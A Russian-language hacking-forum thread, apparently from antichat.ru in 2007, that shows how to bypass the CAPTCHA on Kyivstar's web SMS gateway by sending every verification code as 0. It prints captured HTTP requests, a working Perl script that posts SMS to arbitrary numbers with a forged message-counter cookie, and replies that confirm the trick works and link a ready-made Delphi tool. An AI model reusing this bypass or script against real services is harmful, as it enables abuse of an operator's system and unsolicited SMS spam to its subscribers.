обход CAPTCHA III Краткая история CAPTCH'' ~~~~~~~~~~~~~~~ -CAPTCHA I Самая первая каптча была банально простой ,баг был в том, что кодеры немного промахнулись и влепили код подтверждение прямо в куки , об этом можно немного почитать здесь _http://forum.antichat.ru/thread36930-dspam.html -CAPTCHA II Упустим этот раздел. Пусть останется в секрете ее обход (давно уже переделали ) -CAPTCHA III //После обсуждений киевстара с "vvs777" (03.08.2007) началось самое вкусное ,зайдя сегодня ночью на форум узнав что снова переделали на kyivstar.net каптчу решил на это взглянуть Впечатление было ужасное . После набранного номера и теста , нажав отправить я был в недоумении "Вкажіть 2 картинки живої природи",я подумал уже что обхода уже не найти ,решил все-таки указать эти две картинки , врубил пакетолов . И что я увидел: Code: POST /_sms/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */* Referer: http://kyivstar.net/_sms/?lang=ua Accept-Language: ru Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Host: kyivstar.net Content-Length: 240 Connection: Keep-Alive Cache-Control: no-cache Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXX&lat=1&message=111122&code=1186099766&code=96055154&code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE61B395669BE767085&code=0102 Ненашев нечего интересного (кроме каких-то 3-х сообщений в куках ) Code: Cookie: countSms=3; ,покопавшись, попробовал передавать везде 0 Code: POST /_sms/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */* Referer: http://kyivstar.net/_sms/?lang=ua Accept-Language: ru Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Host: kyivstar.net Content-Length: 240 Connection: Keep-Alive Cache-Control: no-cache Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXXX&lat=1&message=111122&code=0&code=0&code=05&code=0 Тем хто непонял я заменил ключи (которые генерируются фиг знает, каким способом ) Code: [B]code[/B]=[B]1186099766[/B] [B]code[/B]=[B]96055154[/B] [B]code[/B]=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE61B395669BE767085 [B]code[/B]=[B]0102[/B] Заменил на Code: [B]code[/B]=0 [B]code[/B]=0 [B]code[/B]=0 [B]code[/B]=0 После отправки модифицированного пакета на мой телефон пришло сообщение Ниже приведу простой пример отправки сообщение на перле.. Code: #!/usr/bin/perl # 03.08.2007 # http://mobilnik.ua/news/12301.html :) use LWP; use LWP::UserAgent; use strict; my $browser = LWP::UserAgent->new; $browser->agent('New captha v3.0'); #$browser->proxy(['http'] => 'http://61.47.2.249:8080'); print q( -------------------------------------- | | - | + | x | -------------------------------------- | specical for antichat.ru _______ | | ------------------------- | || | icq:212-905-288 | ? || | ------------------------- |_______|| -------------------------------------- ); my $mob_code = "097"; my $mob_number = "XXXXXXX"; my $messenge = "hello antichat.ru"; my $curr_cookie = "countSms=0; isUserLogined=false; countSms=0; messageID=20070702223308.610CC7%40messenger"; printf "\n\n\t[+]Send %s-%s \n\tmessage: \<<%s\>> ", $mob_code,$mob_number,$messenge ; my $url="http://kyivstar.net/_sms/?lang=ua"; my $response = $browser->post($url, ["submitted" => "true", "lang" => "ua", "sms_adv" => "101", "mobcode" => $mob_code, "number" => $mob_number, "lat" => 1, "message" => $messenge, "code" => 0, "code" => 0, "code" => 0, "code" => 0], "Content-Type"=> "application/x-www-form-urlencoded", "Cookie" => $curr_cookie); Важно : 1-Материал исключительно в ознакомительных целях! 2-Автор этой статьи не несёт ответственность за возможные последствия использования материала в целях, запрещенных УК Укр. и нормами международного права.
Респект. Держи + в репу. Тема действительно работает. Киевстаровские кодеры или недоучки или с компании зарплату получают не за месяц а за кол-во работ =) что в принципе правильно. Полностью поменяв алгоритм картинки они забыли о главном =) - о проверке правильности инпута. Вчера ввели новую проверку на ботовитость а сегодя той проверке пришел белый и пушистый. Так что все у кого мобильник с Киевстаром - отключаемся на пару дней потому что то что будет когда то прочитают ... с4 в ужосе и медвед схавал свой превед. Жаль не застал я времена http://www.kyivstar.net/cgi-bin/sms.pl с параметрами to_addr и new_body. Тема имхо достойна раздела "Статьи". Добавил: и вот еще моя реализация метода на Делфи - консольная софтинка =) http://vvs777.ho.com.ua/sms/KS_SMS3.rar на архиве пароль - он есть в каждой теме Форума. (если б не сделал этот мини-квест не знаю что было бы )
Ваш ліміт на короткі повідомлення на сьогодні вичерпано. Сьогодні з вашої Ip-адреси відправлено 4 коротких повідомлення. они лолы
У меня спрашивают пасс на архив. Это английские 2 слова, содержащиеся рядом на видном месте вначале каждой темы на Ачате.
Все Белый и пушистый. Пусть еще команда Киевстара в новостях после сообщения о том что ввели супер-кибер-епт-новую антиспам систему напишут что на следующий день эту систему на*бали =) Ждем продолжения балета
Креатив в тему от меня: http://vvs777.ho.com.ua/main.phtml?creates.htm а именно это новая капча =) оригинал взят из упоминавшейся Demonoid'ом в 1 посте новостной ленты http://mobilnik.ua/news/12301.html